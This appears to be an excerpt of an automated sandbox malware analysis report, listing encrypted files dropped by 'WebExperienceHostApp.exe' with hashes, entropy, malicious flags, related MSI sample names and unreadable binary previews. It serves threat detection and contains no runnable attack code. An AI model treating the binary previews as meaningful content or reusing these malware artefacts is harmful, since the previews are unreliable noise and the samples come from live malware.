                                                                  SSDEEP:1536:GXMMgrjGMVsyisWAOuxqJgMjQyPGsOCWftvuM7hmeK0PpGpmLM8sD8FXT:GXUHGMVsyifOCdjQyPdWftWM7hHGpmg0
                                                                  MD5:D156F2692D2595684BD3CE3EC5F37A38
                                                                  SHA1:7598E0FDB9A12AEF4C84421BF8B308AF82AE9A56
                                                                  SHA-256:80840A431D3021AA592E72BEE152CAE1AEBF2F81475692E02A7874481C2CD73B
                                                                  SHA-512:0E41534FE4FAC8BDD8E828BA98578BEAA281B1E356B9D1459DE67C09C346842A791A26FDC27A79F302F03CE8F16857CCB47B3E68593E8B99BD734B56A3FAF590
                                                                  Malicious:true
                                                                  Preview:.AI.m.*......n+./.......K...Z.'_.-...l..'..M.....|..6q...6M.s.Gb,..c....$m..e....6X\......La....Lq.F ."..>;..{d..r.n.~&....o-.*j...........Cy.......%Y..M.... I..c...@.....\..9Y...D:3..4y.g+w.D.{$.t....W.Ts... .&.......?1.q....Hu@.6>b.tk.%A....Y.X..T./.L.f.c.....<..2...E..v..5.....Z.7.?*Yn.c....;.[.._=....;3/.=HD..@.wE....b~..D....u..1.....Z7......"...0...g.X.s.4.y....je..m.d0[.. .n...1..X.x...55......1....{\..;T..... .h....0R..UD.8..(.B..x...\.cG..u.}8..g.o...k..@K.K.8M.)....\{..X........q.H.GO<..6......3..:...y.H.........#.4>h#j.r..M..?P{+*...jx..?2.&..Z.7l.....]z.....c....XG#.muE9&..-I...w...+....]..YQ.......g.^..E.&/.)-.....,."....T.....t..6.y.h.........k.-0..N..^..jq....b0.--b.8.e..W..*...C...9P4Hx;....v;.>.L.....cK....$t..:Ds...C.V.f.w........9.[.$).D......u.*z..t.U4."F....%B8u ..`..yENe...q(.;..S.b.n.]|4..N......y...c./1.....`&....V=}G.....s....F..nn...b..x.....!..~...3S.8>8.3]:.,........z......{..U...@2."i*%....]f...C..X...k...0r
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):99237
                                                                  Entropy (8bit):7.998239611450476
                                                                  Encrypted:true
                                                                  SSDEEP:1536:v13/b24m8go97w69LJ10Mn+PKuIJFUt9d3igGf0JApvPbgsW7Q414LkY2:v1SI7w69LJH+yhJq3rG5pvTdQKwL
                                                                  MD5:C26CC642DD601D51D7A7DF598D64F699
                                                                  SHA1:A69260691F1E428E9378123112E748C94B3ABF10
                                                                  SHA-256:A991FC132AB623E18988A85999271634EB626C876847EEAA02E6F764E481BA0F
                                                                  SHA-512:5B86C7C06ED79D0DA84CDBBB1E75BD115926005C813FB008E5A865A8B2D1E0EAA885C52B2170B7186C7BAC9ABE05F56C4612A142CD67C92696B843CC6BB973F7
                                                                  Malicious:true
                                                                  Preview:..>..r.;B.`P.....|....)N-..P.....*.qF..S...H.s+.O...4\.$Y<.1R.~`..A.d..'k$.\E.._........=.gE..s.%..`.o..%....tO.....`..n...!.;Q....-.[-... ._.pX..N.ci.|..zhO.T..N......H*.&...H.[....0F..;.. Xg..9...y......kt..m.c..v.......#....xh..jiiV..9.(..>[.. P..M.Na}....1..|......2......*!.h.*.h.1..-.C...........^..S....C...^.j...{.J<t.!?..Q.%g..$y..g'.S?.i.Y&..0.J.'.'......&^.r}f.r..Y..{...._c....X....B....D..Qr./....v..1'... .k.,..{Y=..ww..M.!....._...l.Y..a-J.uA....".. ..t..k-..U...N N..D?. ..$. ..5.M.Sg...q.)..3U...V.N......m1....h..h`c_..,u*.....V"........W...3......1.'....Lb....&.qW.p.q.gY.c(.[V.do.N..}..|j.P..0...9..P..tv..r09.WZ..t.51N:/...2....{ .+.W..>L..(.@....4.n...q6..B;....1._.V.............Y...d....v...M...=........8..P.`..@sA.*m.v..)..I|........@.S.d!..c`....e)....kj.h .... ....A.VxUq.O<\.u...+D..9s..=..`..D....j.C{....Y...s...;....P.#9@..UO...|3....2E..o0.D.w..4Na6c.C..P.L.....U!.......W*..N.%s.....7.]...>}...T.U[|0.>..)U6....5..\......8
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:COM executable for DOS
                                                                  Category:dropped
                                                                  Size (bytes):32837
                                                                  Entropy (8bit):7.994487964618717
                                                                  Encrypted:true
                                                                  SSDEEP:768:izMjA84o8RAiJpEHDEHMraBYYK+5E/pUdamy0fZgroff5eZWD:izMjANQizEHDiMrGK1Udv7fZson5P
                                                                  MD5:DB1FFB5BCE3851DDFA2EC50514B3B6A7
                                                                  SHA1:8EBCD38ED798C79B3389D1AA3030E7609C09BD9D
                                                                  SHA-256:34397DE1D9DC94AAA08CA1D267B64B0E12CCABA008BABE6F592E563F00DC874B
                                                                  SHA-512:B9AE84D09E7C4EFAFF2A8374A1627CFF54EB4A43BFE7C9938FBBF803407B5DC84DE953FBBDC628B9CB39EC8C5AB886CA4F8117A65F49CDE7D2CCA9F1F839C03D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: hForm.0198840 739798.msi, Detection: malicious, Browse
                                                                  • Filename: ust_019821730-0576383.msi, Detection: malicious, Browse
                                                                  • Filename: Br_i421i2-2481-125_754864.msi, Detection: malicious, Browse
                                                                  • Filename: 181_960.msi, Detection: malicious, Browse
                                                                  • Filename: 232_786.msi, Detection: malicious, Browse
                                                                  • Filename: zHsIxYcmJV.msi, Detection: malicious, Browse
                                                                  • Filename: 18847_9.msi, Detection: malicious, Browse
                                                                  Preview:.$.:m.a.. Udh@.B...>2.......8+..(..+I.Q.....R]...T'..._...@ T...*.c;.E9:...3....e.;........Z.....+H..Z.!WXb.9.&...-.m..uP..o.....(.."...:.#r.9y...t.>..O.z....=.Z.D;...;;.....FY.A...T.C.......W..!9D.ob...EPW......;|`.8R....&z.Qk.wz..w..[.....d...h..8.'..0.....C...!nm........}.....e.j..FL..>.e.V....hZ...:l........;m..W@.I.n.........B.9.u.1.t5=.!|.+..Ci../...8.l}_ 2.M9.......e"..m....C...6.j.R.a..U.....n ........2.\....j{....:.+.F...l&.7..O.N....".zO.....}..]......\.RN.D...InW..X.J..E._t...e.n.R@..[.N-8......{....RY..\.E~.o.I../s............l.d.ZU..".-dt..|`.A6.&.Z.4.Z".(5.'......'uCX..<6.......:..!...h.n.6Yl.>.....v.b..>..kb@.....<..PI...h+....f....j...2.L7D.Dt.@<....b.P.._..M.E..+5...o[..G...`Pj..J5*f..^Z.S.....O........B...,;.............=UymZ..-1...M.1.E3....p.`&4...)..>W..w.o......QC.E+6.e).3..9...U`.._........r..GQ8QY.........y...*.7..bt.=..9..NB.$x.......Y.L...r..L.OZ.#y..5.?...c."&...;,h.P2&jF..y.X...f(..{...\h...'....'" .q.u....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):63988
                                                                  Entropy (8bit):7.997031990986062
                                                                  Encrypted:true
                                                                  SSDEEP:1536:9wlDRGx+2RCvu5IFZaHI2pyj1bEfSI8DWnubvzbsCHE:mlDRmsW5YotpOb88DWu/Ab
                                                                  MD5:4D5CC552AA2285B6B7A27976E589F607
                                                                  SHA1:20AA76BFC2A3877F87883C510F2D0E4A20136E32
                                                                  SHA-256:2899D6838DB152DF23B5F17F988160FC48F3973DA2DC9CF2BD3BFB029AF5A1C5
                                                                  SHA-512:43AC789C17312FB7BEB42E6CD7EF27EDC8841D7DAACED6DDE9A528F76782B571C5BE8384088094CF721A45DE54446D7DFF4556325E082D66B2600AFC8F9F7B1F
                                                                  Malicious:true
                                                                  Preview:Y...c...R.#..5.@.'..."...I.%..f....O8...9.....D..p.....NU..\.@B..p_..'..D.k.`]...xE.1...O8.@q...X.0..Y...,6..u^..C.j.A.oaS.{.]u.|..E....O.b......z....d.S.H..&R..WK..s,H..s..epH.(b#:.X%.z.....t....Z..-..N.if>.....>_L...JH...Z...7....T.o..........?.1RFyu.....#.D..@8...}....`R..n3.E...@.gL>..a^....U:^..--P.7k-.A..*......O}....;.NC.d...<i.L|..........`L...*.........1..$Mk.u...9)....?Q.1V......C...P..I....1..-7#....N.< ..z\..`..8..u5.......A.SW......*....-.3n+...x..Q...[U.....{.[....`r....gX.......q..aV.....=...]>y..Y.f.D.B.....6..........TC.>.*..*.ZzEM~jl..P....'r.t..r...P..Z..:O..bNZ?*......Z.*-...%.....~..yi...0..b.-...e..nI>.1?.[..........+.R.C.N.q.5w.......1..J.[.ZAM...%H.l......q..*.}U......./..e..w........[....2..L..C..=..jJ.k..S.IQ...k{.tM...E{d.].&.\.)..... .>.yO......(..}V#x.<.U..Z...'VZ`...C.~&.E.g....{..fJ...%..'.Ol..y.V...Cl....."..(J?.4/*4#.....fIq.cs"JW.8q$J.8.....n...K|.#......g....{)..p.w.qn.>J.Y..h........EZ<...<*`.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):42334
                                                                  Entropy (8bit):7.994972834673255
                                                                  Encrypted:true
                                                                  SSDEEP:768:bsMNJmKf8DSbUkChIGEM4Q7sc8W4su3YE03jNR8KFnWDz51JKq6wu:bseJHIEVXp3YXlniz51JTFu
                                                                  MD5:F23A5FB6A22EC1A42CECBCCDEAFB27DF
                                                                  SHA1:E03C213DB03FBF91635B2D2693F0F0C5A319728E
                                                                  SHA-256:B67DB4FDE2BF13D2BB292AD6506A37DC48610A82EDC71F685253D67E248CF379
                                                                  SHA-512:360B130CD8FF166E936F2C21A6778161B7BAE0E8B8C2E1B2318CE851C3D891951E82B236559F7E256B084CA4A846A58441957D6A9B7FA34CEBC3120C49F8BC17
                                                                  Malicious:true
                                                                  Preview:.B.+`.....<]T..4k..........!....3.z..x...!.]=.........y..L.v~<.cT.C.....{..,....0N1{...=...f.{.1&.g+H.M......../.3%.O/.....A..c..."...k..I?&.*b...3..I,^Z..5Z.l..~\.!.B0t...`.>|e..X..T*....kS..b~.D.?...+J....N...'m.F.....%VE.2Q.1.%h......}K6=X.r"<...{.....I.:j......%U].VS.n9L..M<...G.....BYi.J...k.QH+...m.....T...dc.~2A.79.=..-.^..@.W7...(qA../..8.$.i...l...G..,.l^.b.AR....(....I/l.`zI........Ex....I.....u.PSLC..z.....KC....p.s.........X.sJ....e......<.....f.....:b|_..h.....{..GWa.\2....d.......lb.y.1c. fw.?.....ET=k.....1..].$...y.'#a...E@.tr.s..=......'.&H..@S}o.....j..MC..A .......t.4S.........T6..X(.A.....)z.W)..R....X....f0..~...|Zw.,T6...'.K...iY..4.q..0.1e..).1..Re2!?.u.O}..C.x.5x{&.....yJ)K....@..........J~F...]...qNr.._..h.........Pi%VZ..g..o,..M.........k.M.3..e.!ef....\m\...N.y;..d..nhwfl..Bp|..Z2.:YG.5...9p.=.u.....n...v......T.yA../4.?..<.Qs..3......??.q....2...x...i..........5.}>..kyY4.YE3F....K".C.[..f.@`
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):98025
                                                                  Entropy (8bit):7.998074237488327
                                                                  Encrypted:true
                                                                  SSDEEP:1536:/kicEGiOnccTuHcesv+ZAWwttGj7/mOyb3kFRb4eDmolQX2IO/q15RVsK5mZfcs:/lcO8esWZ3w22Nb0FRbKEQX2IqK5mh/
                                                                  MD5:FC88C05D5B0283D962D13EA2EC177688
                                                                  SHA1:6C2DE92FA17C52F42211CE4C0FE9D22AEC382537
                                                                  SHA-256:E4465FE9F964359DC59F6508D73FFA017EFD4440E116E843B486F304BACC73CC
                                                                  SHA-512:127C3FE23A8EA58665E71682DD909B1E954562D1377281407B7056DD365A24A3575F6E21FBDAB9E2EEC992608E7E5CC5C3C43F801A078A1FE35D494BFCC8067F
                                                                  Malicious:true
                                                                  Preview:/.P3...E.{...b..&..{.A.6...:...f.S.8.`B....t".[q_.4..h...A...>....,.,....N.....F...e....7.`"W...x.Z..X...Cw.B$4.?R...<~...<*...q-V.~..Bs...y..B..E....6..e.<,^^...'.K.Y...B...N.....<,......Q.d.3R..Q..X.ln(X.Z,IB.....sS<....?....[..!..c.E)r.....A..z..H.".x"@@.Qf..%).G..@..."8|....U....y.k.H....V5j.V.....x)/..y.N= ~.hs[aZ..".c#...R.+,#.*..Jj'.8e.$s...Z..oX{.j..|..O.'E...=.dY..).....%.U......T...._.......#<..ap.I`1,.*L.TVs.S.".)..y..A{.@.'..<....$..(4...b-..)...)....I .9JrT.7......p0.&.u...0vA&qa...a..;....i.-..Db......*@..o.....t.%.vG.. .......'%.>;A.6A...v.....'!}.$."9...%..k..|....z...W....Q......>..>...H.....<.rXYW..."".....@.~Q\........|.tI..M.|A$E...2UF....H....m..eJ.p.%.9].(.=.k.3.j..1RU?4Y-.{.T.....e.!.A..+..'....+.].~....8........f..^E......[X..cj....(p..B..|...6.Y.%:.......$..-/cg".[.R?C"}l....S.......,.OU..P..j.o...._H...w.1....z..*Xy.........l.....8.*Yl.N.h.m.;..!..|........m`.h&..:................./.m[~.r+E.\.&...}rl. C. ...ek
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):37714
                                                                  Entropy (8bit):7.995314097222126
                                                                  Encrypted:true
                                                                  SSDEEP:768:QAe3p4aYHCvf9SX8kkpTrtIreJdq5SjKiKVmx22bWaX2waTg:fe54aECX28kkp1dJagKiQm82H23k
                                                                  MD5:59C6178D0D65B782B2CEA581172D64C9
                                                                  SHA1:7AA2BA64047A3F7E72D92C11C572C442CD4C1702
                                                                  SHA-256:19664EF5B6D64266FD524121869D779D6C9138CAA55D28870B64FBD2D1EE9073
                                                                  SHA-512:1BF44F643FF22D91FCCEE38A4B5C9E21CED91D70651FB67272D660570EB9F0B02834A7F70C672D5D3D5C58BB86F9DC3F048C900AF99749CD90774ADA48073ECF
                                                                  Malicious:true
                                                                  Preview:DV...6V]H}.D.].Q.(.....i....l.(!..~}g.y...EP0.X..5..a.|&A.J..g.#u.U#.'...=...............:x2u.._.iui.#.f~.b....f.Y..>..m...q.lC..8d....5..?A..5.7..,...q#............s.~=?6&Lg....z....tm1.e.g..#....N}~.Q...~wq...eI.*b.N.;........e.....$s../E....|..8i.m&..]........C.....Qw../.........E...l.<...P.+b...N..(.^S.M..X.. .T...'.....8..I)'......kk...v/.R-8..2....t.p..oA.r..6...HL.d{.oF...4.u.b.....o...d...h.0`E..oy.R{k>I-.I.`=..f_....q.n......oe:.>.'.=R..............S.H.J.?M.k.3.NW@...B.Dy.#T...Fi...^...E..+!..j....*......p= ...U(.....M.*...h...I.C...!Um%..kk..W*^.^@<'.=Ql.\.'....3.h.......f.(<.#..1.......K.7K....<,A.t......<cF....%.N]f....g.`u|k..i...r.(........@W..}..d.{...F..b.I.LC..#Y.}.[..ejb.....w..L...]f.|....pqK-........_<.B.}Z..Q..9.m..j.............U..D.J.W.|....W.dQ#^..J....1n.t....W..l)....!..[O...p.......F...Y..y..6|8.n0..g.$!@#.~E...;".>..5U.\9.......9....s..L.\....Fl...Nv....(..t.q..L`5.....9.?.....{.....-.:y...u.6....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):53045
                                                                  Entropy (8bit):7.996749714967816
                                                                  Encrypted:true
                                                                  SSDEEP:1536:vPyl56sgjNlbkbEzqYzTcduYfdjD5RZlvIQVwHWT1vYOb:Sl59EfkbOqYnuuwlvIB+h/b
                                                                  MD5:4ED8227029ED424E5273F4D8FFC0F7AD
                                                                  SHA1:F529AAA7917B29C4B6444ECB2E37608905017A07
                                                                  SHA-256:00A1089AFD9D8D0E1F2157B75556DC5F86A5D89C1571055FFE1901A0416A3C3F
                                                                  SHA-512:B7ADCD1DBBC1FC061F37053949AB2B903D830DB28514DD8E9E16561FFABF1313114F46127B07C2B0E3B9191CA88902E0F4FC4907DA6AAE264C9B302CDCA98F69
                                                                  Malicious:true
                                                                  Preview:..R.`..\..l..L5..W.'...VI'%..=>.O....".{Z]......Xq"h=F.=.../$..:3.M.q.h..-..C1u......D.....G...l...n.......d.3..K..o.....M!.[.6....>;p...q*.a@R.hAZ4.P.....0.~[..u...9...H.O.f....q?.*o.d.]..^.?.'.jK.........3:.Nr.v.t^T..S.Cj.'4Z9..uw...&....#...o.m...y.~.Iz.R-X...d.<.Q.......... ..L..#w..:....S..O...bt.U..?:3.A..e.}...}.uC.^i.$<.g....qO.UT....n^.....,c..Y"Su#....!.C$....M......k.._.=.....E...)q.mR12`.Wr...:h!......NyC%,&.:r..O....{...y..@."'..o..+..+w.k.0+.....ykD.|Z.lo6..Z.._.......4..B..D...D.qc.H.=..p.FXxF.h..r...S..v.w..F.V......eF.|....C....}{..H.!..G.;...U.9..Y.vwj..... ... .....b...b.G..xh..2..........9g.XA...r.,..gh..Y'..`...:"...........g....H.nVE...s6+.F......+.,^.l.z..%........o#...C.....#}.n....K........J.W.<.&..^.*.k.{.?......U-....a..y.1.._..Y...K^1.r.%q......W...?....6.v.P....;..r3....T........~c.by!!..f'./.'......W....]A].8m\.+.6q..E...h..c._.I.R....ul..`.^......w.J8....R.`.:...LK.8(]Z..u.?R..)..G-.9k...wV:g.a.e..Hb..>.uO...z_
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):31197
                                                                  Entropy (8bit):7.9947487160338735
                                                                  Encrypted:true
                                                                  SSDEEP:768:w1n3Qf6+OtCQKM26WTuQu6RGvqgubHJkR2c/:wqSFtmMN36YyFkR2c/
                                                                  MD5:F8076A297C5D7DC010A796C47B16B247
                                                                  SHA1:C697BBD2827A3BA0E78033D5BD3575024060CC2B
                                                                  SHA-256:BC2DAE78F8E98687FFF4CB85C234023103FD8E5B3CB5791DFD314201A4765483
                                                                  SHA-512:CE84BFAE4952B64D81A772B53CAF8A27974923A717BAE517688B8A78CA542C2D7C430F499A08367C181C5246513B9063D75B716B73CFA196D99B780A745DF43E
                                                                  Malicious:true
                                                                  Preview:..?..c.h.[&......~..wZ....M.p.s&.......G..B....I..\v.k..T.....;..v/...W_5.K....Pv.....7..=.....5..#>gz0....s..ru.dO_...XGO.eUG?.U"(Xq..a..|.....!..q...^...QA...l...Y.D.h.R .*.....s.........d..Sck...D...qa....f.A.d...).).....$(M.T)a..d...)s...N)..w.J..2^./*..,..c.....Ed.u..'...+...!T.k...L s...a...)..1..#.~w.tZ..F....0u...>.Sft.K.1..\x.. yq.P.C.......P.E....k...I..."0.).....Q.k..Z{....e..i#<(.@.B...rw=k..Ni..y.IWBw.x........}y...M..%h.....n..#.r.,&:...\T~_.%x....Y...`m/P..9...Q......E.%.ft.....|....I5...k.C^...b..#..,G.Y.Ve..=.^.\...].<...&.:."......)&*..e...t.<....4<.:.@i.o...N.R..pI.W.u.WX.;...Sy...j...s..p..!..H..2.*..(.....x.H.=.A.|c.+...!L...........j?.^o.....~e..e....@m.>........*..bU.?.ppI.......mL..).1G....E.l...q3......f.CE.X.:.C....$:..T.>n.'.A....L....ohb....9....$..C..E."f...h..!.L....v.G...yX.......7..RZ..E...#.b2.X.b.+..%..D......s..%.y....,A...A1...y./.{........m..`......c.F......G.D.....f...D(q5G.Z.<B.....^.%/Q./..{....Y.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):98424
                                                                  Entropy (8bit):7.998284093395694
                                                                  Encrypted:true
                                                                  SSDEEP:3072:RbfZf1MdGn8q+n+r7y7N8uO//57yA5PJ6TdboeOmn64tB5p:tfZSdGn/o7KJPh6J0eOmnttZ
                                                                  MD5:D04D3B69DC546BE663E3CBF091B9A823
                                                                  SHA1:F3C11661D2FCC9BAB98A958AF9AAE2F8A0B626D5
                                                                  SHA-256:963C269A77DD52561168EF3F89D617851E305F3D292031DC6AE6F96B148F07AF
                                                                  SHA-512:AE90179356203F617687776E8358E619C3663ACAAE8A1AB2399D1AE861DAF6D23F7CAD6CA978BB9D625C189C5AAA9595C3E0031E7187355FD6C3F08A688DDAC6
                                                                  Malicious:true
                                                                  Preview:+\J..]ftT.[....Xm......a+.5Y...a..C.........1.>....*...$c&.+.P......m..:.L.G...f 6.....v)...q.Y.@:.....}..V.R..e*.9......\.E. ...b.....N.tHk.u3.`.L.E....c.u......jq..=_.......h...0... .D.eA.A.}....KP.oC..b1.dPq...b.....{....@..|..P6....6...6$....6.;6S.s6.rO.a....?.;.Y14.....Iy.F..vD...W.../..v..r....z..t.R1.2...u.l&....>D'....6.V$y.....8.T.I..V.....7</t/L..LQQ.gm.1.0.9...'._L.`.dY..E tLs...Q..q.j.c.]+v..on.n*.31u.v/^.../....Q......u....^..sD`....R3.....y..r..t........X|.>..t.....g=.....wkOW.Y.d.L.G..F..Mo..sC.......< .I .......)\...Hu./.........|...R.)..~t.P...0Y.."....fQQ.Nq...+..<...4..n...f..&=l...w....k....-n..a?Q9..o...].W'.S.gT.r;.h....O..Y'.vK.....)j...+.m=.&_E..sB..y$....."..D..N..a+..<..w..u7..c..G...&.d.p...s.../.i.J.#..L.......j&.r`..1.2..($Z..=.......t....4(/.K..D.>s.....7H..{..ab].e.Q.j.. o.!.wb=>L...*...M..?......g,.}....]..b.>.M...d..............bt?-..8.S.#W.i...Dcn.......W4.=../.....~6.+.>.}..........!.O.(.$..W.Y.....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):23022
                                                                  Entropy (8bit):7.992462151837211
                                                                  Encrypted:true
                                                                  SSDEEP:384:UF0U4KO3dkZdhmTY4KjSnyKh+Yxz5rwtJBfgEE9cbU5H0f0fDA5++bJqEOes/gOT:UF0EWiZdhFL5KhbJe4EEubU5H04+bJXG
                                                                  MD5:1E86C96F528D9CAEAD6A160380F08A95
                                                                  SHA1:999520E27E7B2AAE8071C167DF024437D57EA16E
                                                                  SHA-256:5BD009392E87EF83B1F8CA8F29923441B3A9D56A8698B3CB04EB52448479DC1A
                                                                  SHA-512:56FC473827A6E3B3862B82954DC117053E5DC5E0D301FA166218C8F574F507AAA15C73FA741037EA03D088E2918316519661AA65A56B6068C99BAEF8AE97BFA8
                                                                  Malicious:true
                                                                  Preview:..........S.. .......z....q.L.4._.x9._S.......?;f..[...;.~..|....8d..(..7Y~.f6v)...:(.....E5.7....._..Y.Nj...uq....H#m.JC.L...~._...., o|:....R.?..N....<..f...$.8.l..H..p...-..x..i!.9.*..~...*......L...(C.~..[...j.T...@....E.|.<...q..'.......... ..{.Dc.............fR....>...e..K|.4p}.z,....z..^.....*.=..6Y..A...nJ...F<<^...BC......D..6.YP.JP..&~........f.v.tO..K.N..aNJ>..%RM.O>.../.}.~..Y.Q(..j.8p..`..[.......1......JL....p"...k.............!t....;`..+h.....B..g:..d.c....f....&...b.M0....l......O>.9>b.D..{.c.n..i6.....".X.P../D..u.u&..^=2..o...^.....`.S..n....&4..{....Ph.3......cn.0....c.S.Hx...Y.|...b.........h...`gc{..>...a...g..;<M.4o..M.*......F.......(.B...*..5.lL..u.Y.AF..`."j.H,...%^..].7v..0..&..2.L_.~....=M.^._.975.......!.JR&....$8..s......3e...>._2.g3N..x...H..v..f.5..e......E..)..NM..Ic...p../4.f.u>4...M..u.o\.jC...T..v{2..}.:...<$TTp.c.5..L|.........Z.!.]e.......{@.hB..r....y"5.>..S_.m........\8...U.O;v.Ho5.=i?..(... .k..
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):32649
                                                                  Entropy (8bit):7.9940987497850395
                                                                  Encrypted:true
                                                                  SSDEEP:768:AH5QSuwhSPUsmZgxs2fAy0M0ffhJl3INRN6jdV62qpPbVKn4Qm:AZQSuw2Uxixiy0RffhJVK/6BQ2qpPbYU
                                                                  MD5:765583B8D57070F481B9FF33C521F610
                                                                  SHA1:D169ED2B10681C351A18D9C1A07072F883CE07E7
                                                                  SHA-256:3B4B05C095909D0E1D1D1C98B956D7A53027FC1E4A13CEAFE31EE69DAE5E5E79
                                                                  SHA-512:7216F908A0503BE352DF51727CBC3E6202731633E40D1D161A373A2AB8650D57711AEFEB115C8559075876795CF346EAE6E61CE90839DAD6231650F15CCC7028
                                                                  Malicious:true
                                                                  Preview:Qq..zI.(..T.+8..."..\{9.N..iFd.%..(.71s.Z.:.q..}.$....>..pSM...!...|N...D.I!.....N'(....}5e....k.x.nX..+c.5..U....?..$.../rc.. ..r.jE"...sgQj.h..K..D..4.%N ....$...s..~K...}x.1.....}.^l.V{....*..pC...KKbZ.^B.>z../U....z.>.W..:=...$M...!.KS.........S..s.7..U.Q.8.....M#&..z..ru...).../.J8..E..?..i?^(..e.QZa.Ot.9.{3.;ynv.t(.`..T.t..../.U.#.6..1..]dcj.\....8.%H9.....y.(..g .;v.....7...YT.C..'...@?........{..YB.;.na4.D.v.4:....Cz.-D...E.ZG...v...<:.D..... ...&VU....P...M.5.v*....B3.Mj.t~.p....q.8..07F#b..g(H.gA.XW1Q&....1W..q.m3MbV?P@,...=a_*'.C.Tk."..wD..0D.s....Z}.0..i..<.=.Q.....6.-b..S|..Q..k..d.4q....}..].8....%.Jm0....&.&.o.....Jw.N.....`..H.r8v.L._&6_;..}....$'GTF_..e.T.8j..CQ0....|..{..&.}+.Y"'Xr...crK..$..."..X..l.A.....Y.D...P.b..7F.U.];O...<.5!..E?U.GqO.-..}.%n..........3...v.^.,.|.<.z..#.r.J..T.G..3...YL.<M.!.....ks.=....Leb]N...t..(m.={..?..3.T;?.2.0..,..Z...R..QeGa.........!.K.6. ..E.c..93.gn.y...9U..*U..}.......J...............i
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):79975
                                                                  Entropy (8bit):7.997545621684208
                                                                  Encrypted:true
                                                                  SSDEEP:1536:XIal/z8ddn/W3mCwkGXiy3KcjiNShkhKnh9JWrdqakoDU:XIu/Kn+6kGXi+jBIeh9ErQoDU
                                                                  MD5:5C1AE5B3B2B9CB775B39E0C1D256AF6A
                                                                  SHA1:007874F602898BB60F216A99181B4C7C4D481785
                                                                  SHA-256:702D224FB63A7B95502B8091B170A9D40514B1FF5DCB8C2096C2F91CD50E301B
                                                                  SHA-512:067E441963618C2F63B445F4AA21AF90C0EE6EA17485B740787BFFEAA7D6414C62C0BE2859BA887C871ECCBC776430D2773246B21A590FD6D87BFF01672D884B
                                                                  Malicious:true
                                                                  Preview:&...O..SZ.&PE...H..Ej1p,k..cg..'...........$......d.ST......P...o...h..b1 .f.......0...E....e.....S..W}.r...6.k....{.k...?..1..r.2%c..=>......7...m..r.jf{..;.].h......!.!T(We...i...mm6.f.(..g~.9.X.;.cV.8.M;...%.O......a.8.....v......2v..........R...`.t..o..%.7S.......9N..e....4..xb..i\.;B.".i\zR...h.N.X..$....1...{..p.g...<...A.*Y.J|2/fe...Y.{....4.%...2........q.6u.y.w..pp......L.u..6e.{@T....Dk./t...E..."P.;P..A...^.......|v.p...B..W......4X.....D........g....V..?...pE..i.L$' .,@z..Q....v..n}Iws.r...c.......d..:y..X.=.P...8.W....,..`.......5.op....I.......yI.......G(Q..kZ...\.L.]5.?..x=..ZX...sK......a...i.........C.OE.N..........F.+.d.M.|.."j.(..Gw........|...:C...z......].......C...t...[.xQ]DB.&..n%......<...:D.q..k5)..;1B.@....>}L..;4..8....t._2..B.u.x1...w...]...'....../%..a5.O...QL..+%......p.<.|..l...H.<......Y...'c..wM.....<..%..:57..S0.]d'..(.of..d......}....@..V%`f.*.$.G.Wk.e.T..}..4I..SYq.?y.R..\.....IT..+..^{...c..#.....#R7
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):56461
                                                                  Entropy (8bit):7.9973880039265675
                                                                  Encrypted:true
                                                                  SSDEEP:1536:CD2zlLmcFQF5cnac2DeJTwKHw0JVFA2p3N9hnxvsuNTOSr:CD2hLvev6a7CuKHPJ59dxvso
                                                                  MD5:7242A3104ACC425C97B62C10DA4E3A79
                                                                  SHA1:D2F43A6E2BCFB8296F1ED44CA98F1D42A25220C5
                                                                  SHA-256:C6E28AFB64F733D0B2F549E3FE0EB6BBED2B278434EA3CFD136569AD7B067356
                                                                  SHA-512:79CC62F151B90B998481B98FA01E8B64BF691D633B68FDC8E3D69EA89AA3CAB255682289905D75E13D3A15C80DE482C2C0F2B07CE8E7903E7D30F9DA5AB0FFEB
                                                                  Malicious:true
